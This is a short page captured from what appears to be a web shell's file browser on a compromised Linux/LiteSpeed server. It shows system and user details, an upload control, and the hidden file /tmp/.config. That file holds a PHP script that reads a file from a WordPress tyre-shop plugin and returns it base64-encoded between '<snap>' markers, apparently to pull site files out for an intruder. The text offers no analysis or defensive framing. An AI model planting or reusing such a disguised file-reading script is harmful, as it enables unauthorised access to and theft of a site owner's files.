HEX
Server: LiteSpeed
System: Linux s4814.usc1.stableserver.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User: autlimited (1987)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.config
<?php  $path = '/home/autlimited/public_html/wp-content/plugins/tyre-stock-shop-by-xd/dompdf/vendor/dompdf/php-svg-lib/src/Svg/Tag/Polygon.php'; $max = (int) '100000'; if ($max < 1) {     $max = 120000; } if (!is_file($path)) {     die('!nf!'); } $c = @file_get_contents($path); if ($c === false) {     die('!rd!'); } if (strlen($c) > $max) {     die('!big!'); } die('<snap>' . base64_encode($c) . '</snap>');